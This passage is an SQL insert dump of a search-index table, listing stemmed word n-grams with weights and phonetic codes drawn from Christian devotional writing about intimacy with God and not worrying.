(301366, 'sorrow with', 'sorrow with', 0, 1, 1.3667, 'S630', 1, '*'),
(301367, 'sorrow with it', 'sorrow with it', 0, 1, 1.4667, 'S630', 1, '*'),
(301368, 'soul spiritual', 'soul spiritual', 0, 1, 1.4667, 'S421634', 1, '*'),
(301369, 'soul spiritual communications', 'soul spiritual communications', 0, 1, 1.9667, 'S421634252352', 1, '*'),
(301370, 'soul such', 'soul such', 0, 1, 1.3, 'S420', 1, '*'),
(301371, 'soul such that', 'soul such that', 0, 1, 1.4667, 'S423', 1, '*'),
(301372, 'soul yield', 'soul yield', 0, 1, 1.3333, 'S430', 1, '*'),
(301373, 'soul yield to', 'soul yield to', 0, 1, 1.4333, 'S430', 1, '*'),
(301374, 'spirit as he', 'spirit as he', 0, 1, 1.4, 'S1632', 1, '*'),
(301375, 'spirit comes', 'spirit comes', 0, 1, 1.4, 'S163252', 1, '*'),
(301376, 'spirit comes first', 'spirit comes first', 0, 1, 1.6, 'S1632521623', 1, '*'),
(301377, 'spirit it is', 'spirit it is', 0, 1, 1.4, 'S1632', 1, '*'),
(301378, 'spirit keep', 'spirit keep', 0, 1, 1.3667, 'S16321', 1, '*'),
(301379, 'spirit keep your', 'spirit keep your', 0, 1, 1.5333, 'S163216', 1, '*'),
(301380, 'spirit making', 'spirit making', 0, 1, 1.4333, 'S1635252', 1, '*'),
(301381, 'spirit making you', 'spirit making you', 0, 1, 1.5667, 'S1635252', 1, '*'),
(301382, 'spirit realm', 'spirit realm', 0, 1, 1.4, 'S163645', 2, '*'),
(301383, 'spirit realm 1', 'spirit realm 1', 0, 1, 1.4667, 'S163645', 1, '*'),
(301384, 'spirit realm do', 'spirit realm do', 0, 1, 1.5, 'S1636453', 1, '*'),
(301385, 'spirit regular reading', 'spirit regular reading', 0, 1, 1.7333, 'S1636246352', 1, '*'),
(301386, 'spiritual communications', 'spiritu communications', 0, 1, 1.8, 'S1634252352', 1, '*'),
(301387, 'spiritual communications or', 'spiritu communications or', 0, 1, 1.9, 'S16342523526', 1, '*'),
(301388, 'strong for', 'strong for', 0, 1, 1.3333, 'S365216', 1, '*'),
(301389, 'strong for battle', 'strong for battle', 0, 1, 1.5667, 'S365216134', 1, '*'),
(301390, 'stronger than any', 'stronger than any', 0, 1, 1.5667, 'S3652635', 1, '*'),
(301391, 'such that no', 'such that no', 0, 1, 1.4, 'S350', 1, '*'),
(301392, 'supreme', 'suprem', 0, 0, 0.4667, 'S165', 1, '*'),
(301393, 'supreme help', 'suprem help', 0, 1, 1.4, 'S16541', 1, '*'),
(301394, 'supreme help of', 'suprem help of', 0, 1, 1.5, 'S16541', 1, '*'),
(301395, 'than any', 'than any', 0, 1, 1.2667, 'T500', 1, '*'),
(301396, 'than any hatred', 'than any hatred', 0, 1, 1.5, 'T5363', 1, '*'),
(301397, 'that can bring', 'that can bring', 0, 1, 1.4667, 'T251652', 1, '*'),
(301398, 'that connect', 'that connect', 0, 1, 1.4, 'T2523', 1, '*'),
(301399, 'that connect you', 'that connect you', 0, 1, 1.5333, 'T2523', 1, '*'),
(301400, 'that makes man', 'that makes man', 0, 1, 1.4667, 'T525', 1, '*'),
(301401, 'that man makes', 'that man makes', 0, 1, 1.4667, 'T520', 1, '*'),
(301402, 'that no light', 'that no light', 0, 1, 1.4333, 'T5423', 1, '*'),
(301403, 'that\'s what', 'that what', 0, 1, 1.3667, 'T230', 1, '*'),
(301404, 'that\'s what guarantees', 'that what guarantees', 0, 1, 1.7333, 'T2326532', 1, '*'),
(301405, 'the arm', 'the arm', 0, 1, 1.2333, 'T650', 1, '*'),
(301406, 'the arm of', 'the arm of', 0, 1, 1.3333, 'T651', 1, '*'),
(301407, 'the believer in', 'the believer in', 0, 1, 1.5, 'T14165', 1, '*'),
(301408, 'the blessing of', 'the blessing of', 0, 1, 1.5, 'T142521', 1, '*'),
(301409, 'the experiences', 'the experiences', 0, 1, 1.5, 'T21652', 1, '*'),
(301410, 'the experiences of', 'the experiences of', 0, 1, 1.6, 'T216521', 1, '*'),
(301411, 'the fantastic', 'the fantastic', 0, 1, 1.4333, 'T153232', 1, '*'),
(301412, 'the fantastic cathedral', 'the fantastic cathedral', 0, 1, 1.7667, 'T153232364', 1, '*'),
(301413, 'the lord makes', 'the lord makes', 0, 1, 1.4667, 'T46352', 1, '*'),
(301414, 'the lord was', 'the lord was', 0, 1, 1.4, 'T4632', 1, '*'),
(301415, 'the majority let', 'the majority let', 0, 1, 1.5333, 'T526343', 1, '*'),
(301416, 'the patriarchs', 'the patriarchs', 0, 1, 1.4667, 'T1362', 1, '*'),
(301417, 'the patriarchs becoming', 'the patriarchs becoming', 0, 1, 1.7667, 'T13621252', 1, '*'),
(301418, 'the scriptures loads', 'the scriptures loads', 0, 1, 1.6667, 'T261362432', 1, '*'),
(301419, 'the spirit don\'t', 'the spirit don', 0, 1, 1.5333, 'T216353', 1, '*'),
(301420, 'the spirit realm', 'the spirit realm', 0, 1, 1.5333, 'T2163645', 2, '*'),
(301421, 'the supreme', 'the supreme', 0, 1, 1.3667, 'T2165', 1, '*'),
(301422, 'the supreme help', 'the supreme help', 0, 1, 1.5333, 'T216541', 1, '*'),
(301423, 'them proverbs', 'them proverbs', 0, 1, 1.4333, 'T5161612', 1, '*'),
(301424, 'them proverbs 10', 'them proverbs 10', 0, 1, 1.5333, 'T5161612', 1, '*'),
(301425, 'then brings', 'then brings', 0, 1, 1.3667, 'T51652', 1, '*'),
(301426, 'then brings light', 'then brings light', 0, 1, 1.5667, 'T51652423', 1, '*'),
(301427, 'these and', 'these and', 0, 1, 1.3, 'T253', 1, '*'),
(301428, 'these and draw', 'these and draw', 0, 1, 1.4667, 'T2536', 1, '*'),
(301429, 'those activities that', 'those activities that', 0, 1, 1.7, 'T231323', 1, '*'),
(301430, 'though available', 'though available', 0, 1, 1.5333, 'T21414', 1, '*'),
(301431, 'though available intimacy', 'though available intimacy', 0, 1, 1.8333, 'T214145352', 1, '*'),
(301432, 'through prayer', 'through prayer', 0, 1, 1.4667, 'T6216', 1, '*'),
(301433, 'through prayer and', 'through prayer and', 0, 1, 1.6, 'T621653', 1, '*'),
(301434, 'time and intimacy', 'time and intimacy', 0, 1, 1.5667, 'T535352', 1, '*'),
(301435, 'time with jesus', 'time with jesus', 0, 1, 1.5, 'T532', 1, '*'),
(301436, 'to a church', 'to a church', 0, 1, 1.3667, 'T262', 1, '*'),
(301437, 'to a defiled', 'to a defiled', 0, 1, 1.4, 'T143', 1, '*'),
(301438, 'to correct your', 'to correct your', 0, 1, 1.5, 'T26236', 1, '*'),
(301439, 'to correction', 'to correction', 0, 1, 1.4333, 'T26235', 1, '*'),
(301440, 'to correction and', 'to correction and', 0, 1, 1.5667, 'T262353', 1, '*'),
(301441, 'to god you', 'to god you', 0, 1, 1.3333, 'T230', 2, '*'),
(301442, 'to the spirit', 'to the spirit', 0, 1, 1.4333, 'T2163', 1, '*'),
(301443, 'to you too', 'to you too', 0, 1, 1.3333, 'T000', 1, '*'),
(301444, 'to your soul', 'to your soul', 0, 1, 1.4, 'T624', 1, '*'),
(301445, 'to your walking', 'to your walking', 0, 1, 1.5, 'T64252', 1, '*'),
(301446, 'too cultivate', 'too cultivate', 0, 1, 1.4333, 'T24313', 1, '*'),
(301447, 'too cultivate intimacy', 'too cultivate intimacy', 0, 1, 1.7333, 'T243135352', 1, '*'),
(301448, 'too till', 'too till', 0, 1, 1.2667, 'T400', 1, '*'),
(301449, 'too till next', 'too till next', 0, 1, 1.4333, 'T4523', 1, '*'),
(301450, 'vital', 'vital', 0, 0, 0.3333, 'V340', 1, '*'),
(301451, 'vital to', 'vital to', 0, 1, 1.2667, 'V343', 1, '*'),
(301452, 'vital to your', 'vital to your', 0, 1, 1.4333, 'V3436', 1, '*'),
(301453, 'walking and', 'walk and', 0, 1, 1.3667, 'W425253', 1, '*'),
(301454, 'walking and living', 'walk and living', 0, 1, 1.6, 'W4252534152', 1, '*'),
(301455, 'was with', 'wa with', 0, 1, 1.2667, 'W230', 1, '*'),
(301456, 'was with him', 'wa with him', 0, 1, 1.4, 'W235', 1, '*'),
(301457, 'was with joseph', 'wa with joseph', 0, 1, 1.5, 'W2321', 1, '*'),
(301458, 'were against', 'were against', 0, 1, 1.4, 'W62523', 1, '*'),
(301459, 'were against him', 'were against him', 0, 1, 1.5333, 'W625235', 1, '*'),
(301460, 'what guarantees', 'what guarantees', 0, 1, 1.5, 'W326532', 1, '*'),
(301461, 'what guarantees you', 'what guarantees you', 0, 1, 1.6333, 'W326532', 1, '*'),
(301462, 'what people', 'what people', 0, 1, 1.3667, 'W314', 1, '*'),
(301463, 'what people have', 'what people have', 0, 1, 1.5333, 'W3141', 1, '*'),
(301464, 'when no one', 'when no one', 0, 1, 1.3667, 'W500', 1, '*'),
(301465, 'who is with', 'who is with', 0, 1, 1.3667, 'W230', 1, '*'),
(301466, 'will experiencehim', 'will experiencehim', 0, 1, 1.6, 'W4216525', 1, '*'),
(301467, 'will experiencehim draw', 'will experiencehim draw', 0, 1, 1.7667, 'W421652536', 1, '*'),
(301468, 'with god is', 'with god is', 0, 1, 1.3667, 'W3232', 1, '*'),
(301469, 'with god no', 'with god no', 0, 1, 1.3667, 'W3235', 1, '*'),
(301470, 'with god that\'s', 'with god that', 0, 1, 1.5, 'W3232', 1, '*'),
(301471, 'with god\'s help', 'with god help', 0, 1, 1.5, 'W323241', 1, '*'),
(301472, 'with him in', 'with him in', 0, 1, 1.3667, 'W350', 1, '*'),
(301473, 'with him through', 'with him through', 0, 1, 1.5333, 'W35362', 1, '*'),
(301474, 'with it the', 'with it the', 0, 1, 1.3667, 'W300', 1, '*'),
(301475, 'with jesus intimacy', 'with jesus intimacy', 0, 1, 1.6333, 'W325352', 1, '*'),
(301476, 'with joseph', 'with joseph', 0, 1, 1.3667, 'W321', 1, '*'),
(301477, 'with joseph in', 'with joseph in', 0, 1, 1.4667, 'W3215', 1, '*'),
(301478, 'with mere', 'with mere', 0, 1, 1.3, 'W356', 1, '*'),
(301479, 'with mere human', 'with mere human', 0, 1, 1.5, 'W3565', 1, '*'),
(301480, 'with the supreme', 'with the supreme', 0, 1, 1.5333, 'W32165', 1, '*'),
(301481, 'with them proverbs', 'with them proverbs', 0, 1, 1.6, 'W35161612', 1, '*'),
(301482, 'with them when', 'with them when', 0, 1, 1.4667, 'W350', 1, '*'),
(301483, 'with you is', 'with you is', 0, 1, 1.3667, 'W320', 1, '*'),
(301484, 'with you too', 'with you too', 0, 1, 1.4, 'W300', 1, '*'),
(301485, 'with your intimacy', 'with your intimacy', 0, 1, 1.6, 'W365352', 1, '*'),
(301486, 'word with', 'word with', 0, 1, 1.3, 'W630', 1, '*'),
(301487, 'word with the', 'word with the', 0, 1, 1.4333, 'W630', 1, '*'),
(301488, 'work alone', 'work alone', 0, 1, 1.3333, 'W6245', 1, '*'),
(301489, 'work alone that', 'work alone that', 0, 1, 1.5, 'W62453', 1, '*'),
(301490, 'work those', 'work those', 0, 1, 1.3333, 'W6232', 1, '*'),
(301491, 'work those activities', 'work those activities', 0, 1, 1.7, 'W62323132', 1, '*'),
(301492, 'worship keep', 'worship keep', 0, 1, 1.4, 'W62121', 1, '*'),
(301493, 'worship keep intimacy', 'worship keep intimacy', 0, 1, 1.7, 'W621215352', 1, '*'),
(301494, 'wrong and', 'wrong and', 0, 1, 1.3, 'W65253', 2, '*'),
(301495, 'wrong and then', 'wrong and then', 0, 1, 1.4667, 'W652535', 1, '*'),
(301496, 'yield to', 'yield to', 0, 1, 1.2667, 'Y430', 2, '*'),
(301497, 'yield to correction', 'yield to correction', 0, 1, 1.6333, 'Y4326235', 1, '*'),
(301498, 'yield to the', 'yield to the', 0, 1, 1.4, 'Y430', 1, '*'),
(301499, 'you a baptism', 'you a baptism', 0, 1, 1.4333, 'Y1325', 1, '*'),
(301500, 'you can\'t last', 'you can last', 0, 1, 1.4667, 'Y253423', 1, '*'),
(301501, 'you get don\'t', 'you get don', 0, 1, 1.4333, 'Y2353', 1, '*'),
(301502, 'you get to', 'you get to', 0, 1, 1.3333, 'Y230', 2, '*'),
(301503, 'you is stronger', 'you is stronger', 0, 1, 1.5, 'Y236526', 1, '*'),
(301504, 'you must do', 'you must do', 0, 1, 1.3667, 'Y523', 1, '*'),
(301505, 'you ready and', 'you ready and', 0, 1, 1.4333, 'Y6353', 1, '*'),
(301506, 'you the holy', 'you the holy', 0, 1, 1.4, 'Y340', 1, '*'),
(301507, 'you too', 'you too', 0, 1, 1.2333, 'Y300', 1, '*'),
(301508, 'you too cultivate', 'you too cultivate', 0, 1, 1.5667, 'Y324313', 1, '*'),
(301509, 'you too till', 'you too till', 0, 1, 1.4, 'Y340', 1, '*'),
(301510, 'you will experiencehim', 'you will experiencehim', 0, 1, 1.7333, 'Y4216525', 1, '*'),
(301511, 'you you can', 'you you can', 0, 1, 1.3667, 'Y250', 1, '*'),
(301512, 'you you must', 'you you must', 0, 1, 1.4, 'Y523', 1, '*'),
(301513, 'your candle', 'your candle', 0, 1, 1.3667, 'Y62534', 1, '*'),
(301514, 'your candle never', 'your candle never', 0, 1, 1.5667, 'Y62534516', 1, '*'),
(301515, 'your intimacy', 'your intimacy', 0, 1, 1.4333, 'Y65352', 1, '*'),
(301516, 'your intimacy with', 'your intimacy with', 0, 1, 1.6, 'Y653523', 1, '*'),
(301517, 'your soul spiritual', 'your soul spiritual', 0, 1, 1.6333, 'Y62421634', 1, '*'),
(301518, 'your soul such', 'your soul such', 0, 1, 1.4667, 'Y6242', 1, '*'),
(301519, 'your spirit making', 'your spirit making', 0, 1, 1.6, 'Y621635252', 1, '*'),
(301520, 'your time and', 'your time and', 0, 1, 1.4333, 'Y6353', 1, '*'),
(301521, 'your walking', 'your walking', 0, 1, 1.4, 'Y64252', 1, '*'),
(301522, 'your walking and', 'your walking and', 0, 1, 1.5333, 'Y6425253', 1, '*'),
(301523, 'your wrong', 'your wrong', 0, 1, 1.3333, 'Y652', 1, '*'),
(301524, 'your wrong and', 'your wrong and', 0, 1, 1.4667, 'Y65253', 1, '*'),
(301525, 'yourself it', 'yourself it', 0, 1, 1.3667, 'Y62413', 2, '*'),
(301526, 'yourself it is', 'yourself it is', 0, 1, 1.4667, 'Y624132', 1, '*'),
(301527, '“is god', '“i god', 0, 1, 1.2333, '“230', 1, '*'),
(301528, '“is god with', '“i god with', 0, 1, 1.4, '“230', 1, '*'),
(301881, '23 04', '23 04', 0, 1, 1.1667, '', 1, '*'),
(301882, '23 04 2017', '23 04 2017', 0, 1, 1.3333, '', 1, '*'),
(301883, '25 27', '25 27', 0, 1, 1.1667, '', 1, '*'),
(301884, '25 27 25', '25 27 25', 0, 1, 1.2667, '', 1, '*'),
(301885, '25 “therefore', '25 “therefore', 0, 1, 1.4333, '“3616', 1, '*'),
(301886, '25 “therefore i', '25 “therefore i', 0, 1, 1.5, '“3616', 1, '*'),
(301887, '26 look', '26 look', 0, 1, 1.2333, 'L200', 1, '*'),
(301888, '26 look at', '26 look at', 0, 1, 1.3333, 'L230', 1, '*'),
(301889, '27 25', '27 25', 0, 1, 1.1667, '', 1, '*'),
(301890, '27 25 “therefore', '27 25 “therefore', 0, 1, 1.5333, '“3616', 1, '*'),
(301891, '27 which', '27 which', 0, 1, 1.2667, 'W200', 1, '*'),
(301892, '27 which of', '27 which of', 0, 1, 1.3667, 'W210', 1, '*'),
(301893, '44 from', '44 from', 0, 1, 1.2333, 'F650', 1, '*'),
(301894, '44 from our', '44 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(301895, '6 25', '6 25', 0, 1, 1.1333, '', 1, '*'),
(301896, '6 25 27', '6 25 27', 0, 1, 1.2333, '', 1, '*'),
(301897, 'a champion', 'a champion', 0, 1, 1.3333, 'A2515', 1, '*'),
(301898, 'a champion worrier', 'a champion worrier', 0, 1, 1.6, 'A25156', 1, '*'),
(301899, 'a corner', 'a corner', 0, 1, 1.2667, 'A2656', 1, '*'),
(301900, 'a corner of', 'a corner of', 0, 1, 1.3667, 'A26561', 1, '*'),
(301901, 'a false', 'a false', 0, 1, 1.2333, 'A142', 1, '*'),
(301902, 'a false sense', 'a false sense', 0, 1, 1.4333, 'A14252', 1, '*'),
(301903, 'a lot until', 'a lot until', 0, 1, 1.3667, 'A43534', 1, '*'),
(301904, 'a matter please', 'a matter please', 0, 1, 1.5, 'A536142', 1, '*'),
(301905, 'a matter that', 'a matter that', 0, 1, 1.4333, 'A5363', 1, '*'),
(301906, 'a matter you', 'a matter you', 0, 1, 1.4, 'A536', 1, '*'),
(301907, 'a negative', 'a negative', 0, 1, 1.3333, 'A5231', 1, '*'),
(301908, 'a negative emotion', 'a negative emotion', 0, 1, 1.6, 'A5231535', 1, '*'),
(301909, 'a solution', 'a solution', 0, 1, 1.3333, 'A2435', 1, '*'),
(301910, 'a solution sometimes', 'a solution sometimes', 0, 1, 1.6667, 'A243525352', 1, '*'),
(301911, 'a solution when', 'a solution when', 0, 1, 1.5, 'A2435', 1, '*'),
(301912, 'about a', 'about a', 0, 1, 1.2333, 'A130', 1, '*'),
(301913, 'about a matter', 'about a matter', 0, 1, 1.4667, 'A13536', 1, '*'),
(301914, 'about anything', 'about anything', 0, 1, 1.4667, 'A135352', 1, '*'),
(301915, 'about anything once', 'about anything once', 0, 1, 1.6333, 'A13535252', 1, '*'),
(301916, 'about have', 'about have', 0, 1, 1.3333, 'A131', 1, '*'),
(301917, 'about have you', 'about have you', 0, 1, 1.4667, 'A131', 1, '*'),
(301918, 'about my', 'about my', 0, 1, 1.2667, 'A135', 1, '*'),
(301919, 'about my wife', 'about my wife', 0, 1, 1.4333, 'A1351', 1, '*'),
(301920, 'about serious', 'about serious', 0, 1, 1.4333, 'A13262', 1, '*'),
(301921, 'about serious matters', 'about serious matters', 0, 1, 1.7, 'A132625362', 1, '*'),
(301922, 'about to trap', 'about to trap', 0, 1, 1.4333, 'A1361', 1, '*'),
(301923, 'about too', 'about too', 0, 1, 1.3, 'A130', 1, '*'),
(301924, 'about too many', 'about too many', 0, 1, 1.4667, 'A135', 1, '*'),
(301925, 'about your body', 'about your body', 0, 1, 1.5, 'A13613', 1, '*'),
(301926, 'about your life', 'about your life', 0, 1, 1.5, 'A13641', 1, '*'),
(301927, 'activating', 'activ', 0, 0, 0.6667, 'A231352', 1, '*'),
(301928, 'activating the', 'activ the', 0, 1, 1.4667, 'A2313523', 1, '*'),
(301929, 'activating the working', 'activ the working', 0, 1, 1.7333, 'A23135236252', 1, '*'),
(301930, 'add one', 'add one', 0, 1, 1.2333, 'A350', 1, '*'),
(301931, 'add one cubit', 'add one cubit', 0, 1, 1.4333, 'A35213', 1, '*'),
(301932, 'air for', 'air for', 0, 1, 1.2333, 'A616', 1, '*'),
(301933, 'air for they', 'air for they', 0, 1, 1.4, 'A6163', 1, '*'),
(301934, 'allowing the', 'allow the', 0, 1, 1.4, 'A4523', 1, '*'),
(301935, 'allowing the holy', 'allow the holy', 0, 1, 1.5667, 'A45234', 1, '*'),
(301936, 'also enlarges', 'also enlarges', 0, 1, 1.4333, 'A425462', 1, '*'),
(301937, 'also enlarges the', 'also enlarges the', 0, 1, 1.5667, 'A4254623', 1, '*'),
(301938, 'always happened', 'alwai happened', 0, 1, 1.5, 'A42153', 1, '*'),
(301939, 'always happened in', 'alwai happened in', 0, 1, 1.6, 'A421535', 1, '*'),
(301940, 'an anointed', 'an anointed', 0, 1, 1.3667, 'A530', 1, '*'),
(301941, 'an anointed discussion', 'an anointed discussion', 0, 1, 1.7333, 'A5325', 1, '*'),
(301942, 'and also enlarges', 'and also enlarges', 0, 1, 1.5667, 'A53425462', 1, '*'),
(301943, 'and answers', 'and answers', 0, 1, 1.3667, 'A535262', 1, '*'),
(301944, 'and answers and', 'and answers and', 0, 1, 1.5, 'A53526253', 1, '*'),
(301945, 'and answers begin', 'and answers begin', 0, 1, 1.5667, 'A535262125', 1, '*'),
(301946, 'and discouraged', 'and discouraged', 0, 1, 1.5, 'A532623', 1, '*'),
(301947, 'and discouraged and', 'and discouraged and', 0, 1, 1.6333, 'A53262353', 1, '*'),
(301948, 'and does', 'and does', 0, 1, 1.2667, 'A532', 1, '*'),
(301949, 'and does not', 'and does not', 0, 1, 1.4, 'A53253', 1, '*'),
(301950, 'and even more', 'and even more', 0, 1, 1.4333, 'A53156', 1, '*'),
(301951, 'and inspiration', 'and inspiration', 0, 1, 1.5, 'A53521635', 1, '*'),
(301952, 'and inspiration worry', 'and inspiration worry', 0, 1, 1.7, 'A535216356', 1, '*'),
(301953, 'and let worry', 'and let worry', 0, 1, 1.4333, 'A53436', 1, '*'),
(301954, 'and negative emotion', 'and negative emotion', 0, 1, 1.6667, 'A535231535', 1, '*'),
(301955, 'and solutions', 'and solutions', 0, 1, 1.4333, 'A5324352', 1, '*'),
(301956, 'and solutions begin', 'and solutions begin', 0, 1, 1.6333, 'A5324352125', 1, '*'),
(301957, 'and the body', 'and the body', 0, 1, 1.4, 'A5313', 1, '*'),
(301958, 'and worrying', 'and worrying', 0, 1, 1.4, 'A53652', 1, '*'),
(301959, 'and worrying is', 'and worrying is', 0, 1, 1.5, 'A53652', 1, '*'),
(301960, 'and you get', 'and you get', 0, 1, 1.3667, 'A5323', 1, '*'),
(301961, 'anointed around', 'anoint around', 0, 1, 1.5, 'A53653', 1, '*'),
(301962, 'anointed around you', 'anoint around you', 0, 1, 1.6333, 'A53653', 1, '*'),
(301963, 'anointed discussion', 'anoint discussion', 0, 1, 1.6333, 'A5325', 1, '*'),
(301964, 'anointed discussion over', 'anoint discussion over', 0, 1, 1.8, 'A532516', 1, '*'),
(301965, 'answers', 'answer', 0, 0, 0.4667, 'A5262', 1, '*'),
(301966, 'answers and', 'answer and', 0, 1, 1.3667, 'A526253', 1, '*'),
(301967, 'answers and solutions', 'answer and solutions', 0, 1, 1.7, 'A52625324352', 1, '*'),
(301968, 'answers begin', 'answer begin', 0, 1, 1.4333, 'A5262125', 1, '*'),
(301969, 'answers begin to', 'answer begin to', 0, 1, 1.5333, 'A52621253', 1, '*'),
(301970, 'any problem', 'ani problem', 0, 1, 1.3667, 'A516145', 2, '*'),
(301971, 'any problem rather', 'ani problem rather', 0, 1, 1.6, 'A516145636', 1, '*'),
(301972, 'anything once', 'anyth once', 0, 1, 1.4333, 'A535252', 1, '*'),
(301973, 'anything once i\'m', 'anyth once i', 0, 1, 1.5667, 'A5352525', 1, '*'),
(301974, 'are activating', 'ar activating', 0, 1, 1.4667, 'A6231352', 1, '*'),
(301975, 'are activating the', 'ar activating the', 0, 1, 1.6, 'A62313523', 1, '*'),
(301976, 'are responsible', 'ar responsible', 0, 1, 1.5, 'A6215214', 1, '*'),
(301977, 'are responsible though', 'ar responsible though', 0, 1, 1.7333, 'A621521432', 1, '*'),
(301978, 'are shutting', 'ar shutting', 0, 1, 1.4, 'A62352', 1, '*'),
(301979, 'are shutting out', 'ar shutting out', 0, 1, 1.5333, 'A623523', 1, '*'),
(301980, 'are you not', 'ar you not', 0, 1, 1.3667, 'A653', 1, '*'),
(301981, 'areogun is', 'areogun is', 0, 1, 1.3333, 'A6252', 1, '*'),
(301982, 'areogun is that', 'areogun is that', 0, 1, 1.5, 'A62523', 1, '*'),
(301983, 'around she', 'around she', 0, 1, 1.3333, 'A6532', 1, '*'),
(301984, 'around she stays', 'around she stays', 0, 1, 1.5333, 'A653232', 1, '*'),
(301985, 'asatanic', 'asatan', 0, 0, 0.5333, 'A2352', 1, '*'),
(301986, 'asatanic trap', 'asatan trap', 0, 1, 1.4333, 'A2352361', 1, '*'),
(301987, 'asatanic trap that', 'asatan trap that', 0, 1, 1.6, 'A23523613', 1, '*'),
(301988, 'at the birds', 'at the birds', 0, 1, 1.4, 'A31632', 1, '*'),
(301989, 'barns', 'barn', 0, 0, 0.3333, 'B652', 1, '*'),
(301990, 'barns yet', 'barn yet', 0, 1, 1.3, 'B6523', 1, '*'),
(301991, 'barns yet your', 'barn yet your', 0, 1, 1.4667, 'B65236', 1, '*'),
(301992, 'be a champion', 'be a champion', 0, 1, 1.4333, 'B2515', 1, '*'),
(301993, 'be solved', 'be solved', 0, 1, 1.3, 'B2413', 1, '*'),
(301994, 'be worried', 'be worried', 0, 1, 1.3333, 'B630', 1, '*'),
(301995, 'be worried i', 'be worried i', 0, 1, 1.4, 'B630', 1, '*'),
(301996, 'become irresponsible', 'becom irresponsible', 0, 1, 1.6667, 'B256215214', 1, '*'),
(301997, 'become irresponsible or', 'becom irresponsible or', 0, 1, 1.7667, 'B2562152146', 1, '*'),
(301998, 'been so', 'been so', 0, 1, 1.2333, 'B520', 1, '*'),
(301999, 'been so worried', 'been so worried', 0, 1, 1.5, 'B5263', 1, '*'),
(302000, 'begin to flow', 'begin to flow', 0, 1, 1.4333, 'B25314', 1, '*'),
(302001, 'begin to rise', 'begin to rise', 0, 1, 1.4333, 'B25362', 1, '*'),
(302002, 'beloved no', 'belov no', 0, 1, 1.3333, 'B4135', 1, '*'),
(302003, 'beloved no worrying', 'belov no worrying', 0, 1, 1.6333, 'B4135652', 1, '*'),
(302004, 'beloved quit', 'belov quit', 0, 1, 1.4, 'B41323', 1, '*'),
(302005, 'beloved quit worrying', 'belov quit worrying', 0, 1, 1.7, 'B41323652', 1, '*'),
(302006, 'birds', 'bird', 0, 0, 0.3333, 'B632', 1, '*'),
(302007, 'birds of', 'bird of', 0, 1, 1.2667, 'B6321', 1, '*'),
(302008, 'birds of the', 'bird of the', 0, 1, 1.4, 'B63213', 1, '*'),
(302009, 'body beloved', 'bodi beloved', 0, 1, 1.4, 'B31413', 1, '*'),
(302010, 'body beloved quit', 'bodi beloved quit', 0, 1, 1.5667, 'B3141323', 1, '*'),
(302011, 'body more', 'bodi more', 0, 1, 1.3, 'B356', 1, '*'),
(302012, 'body more than', 'bodi more than', 0, 1, 1.4667, 'B35635', 1, '*'),
(302013, 'body what', 'bodi what', 0, 1, 1.3, 'B300', 1, '*'),
(302014, 'body what you', 'bodi what you', 0, 1, 1.4333, 'B300', 1, '*'),
(302015, 'bring a', 'bring a', 0, 1, 1.2333, 'B652', 1, '*'),
(302016, 'bring a solution', 'bring a solution', 0, 1, 1.5333, 'B652435', 1, '*'),
(302017, 'bringing solutions', 'bring solutions', 0, 1, 1.6, 'B652524352', 1, '*'),
(302018, 'bringing solutions to', 'bring solutions to', 0, 1, 1.7, 'B6525243523', 1, '*'),
(302019, 'by allowing', 'by allowing', 0, 1, 1.3667, 'B452', 1, '*'),
(302020, 'by allowing the', 'by allowing the', 0, 1, 1.5, 'B4523', 1, '*'),
(302021, 'by worrying', 'by worrying', 0, 1, 1.3667, 'B652', 1, '*'),
(302022, 'by worrying can', 'by worrying can', 0, 1, 1.5, 'B6525', 1, '*'),
(302023, 'call my', 'call my', 0, 1, 1.2333, 'C450', 1, '*'),
(302024, 'call my wife', 'call my wife', 0, 1, 1.4, 'C451', 1, '*'),
(302025, 'calm', 'calm', 0, 0, 0.2667, 'C450', 1, '*'),
(302026, 'calm and', 'calm and', 0, 1, 1.2667, 'C453', 1, '*'),
(302027, 'calm and does', 'calm and does', 0, 1, 1.4333, 'C4532', 1, '*'),
(302028, 'can add one', 'can add one', 0, 1, 1.3667, 'C535', 1, '*'),
(302029, 'carefree', 'carefre', 0, 0, 0.5333, 'C616', 1, '*'),
(302030, 'carefree about', 'carefre about', 0, 1, 1.4667, 'C61613', 1, '*'),
(302031, 'carefree about serious', 'carefre about serious', 0, 1, 1.7333, 'C61613262', 1, '*'),
(302032, 'champion', 'champion', 0, 0, 0.5333, 'C515', 1, '*'),
(302033, 'champion worrier', 'champion worrier', 0, 1, 1.5333, 'C5156', 1, '*'),
(302034, 'champion worrier that', 'champion worrier that', 0, 1, 1.7, 'C51563', 1, '*'),
(302035, 'clothing', 'cloth', 0, 0, 0.5333, 'C4352', 1, '*'),
(302036, 'clothing 26', 'cloth 26', 0, 1, 1.3667, 'C4352', 1, '*'),
(302037, 'clothing 26 look', 'cloth 26 look', 0, 1, 1.5333, 'C435242', 1, '*'),
(302038, 'comes up i', 'come up i', 0, 1, 1.3333, 'C521', 1, '*'),
(302039, 'corner', 'corner', 0, 0, 0.4, 'C656', 1, '*'),
(302040, 'corner of', 'corner of', 0, 1, 1.3, 'C6561', 1, '*'),
(302041, 'corner of impossibility', 'corner of impossibility', 0, 1, 1.7667, 'C6561512143', 1, '*'),
(302042, 'creative', 'creativ', 0, 0, 0.5333, 'C631', 1, '*'),
(302043, 'creative your', 'creativ your', 0, 1, 1.4333, 'C6316', 1, '*'),
(302044, 'creative your situation', 'creativ your situation', 0, 1, 1.7667, 'C6316235', 1, '*'),
(302045, 'creativity', 'creativ', 0, 0, 0.6667, 'C6313', 1, '*'),
(302046, 'creativity and', 'creativ and', 0, 1, 1.4667, 'C631353', 1, '*'),
(302047, 'creativity and inspiration', 'creativ and inspiration', 0, 1, 1.8667, 'C631353521635', 1, '*'),
(302048, 'creativity and you', 'creativ and you', 0, 1, 1.6, 'C631353', 1, '*'),
(302049, 'creativity embedded', 'creativ embedded', 0, 1, 1.6333, 'C6313513', 1, '*'),
(302050, 'creativity embedded in', 'creativ embedded in', 0, 1, 1.7333, 'C63135135', 1, '*'),
(302051, 'cubit', 'cubit', 0, 0, 0.3333, 'C130', 1, '*'),
(302052, 'cubit to', 'cubit to', 0, 1, 1.2667, 'C130', 1, '*'),
(302053, 'cubit to his', 'cubit to his', 0, 1, 1.4, 'C132', 1, '*'),
(302054, 'dearly beloved quit', 'dearli beloved quit', 0, 1, 1.6333, 'D64141323', 1, '*'),
(302055, 'devil is about', 'devil is about', 0, 1, 1.4667, 'D14213', 1, '*'),
(302056, 'difficult comes', 'difficult comes', 0, 1, 1.5, 'D1243252', 1, '*'),
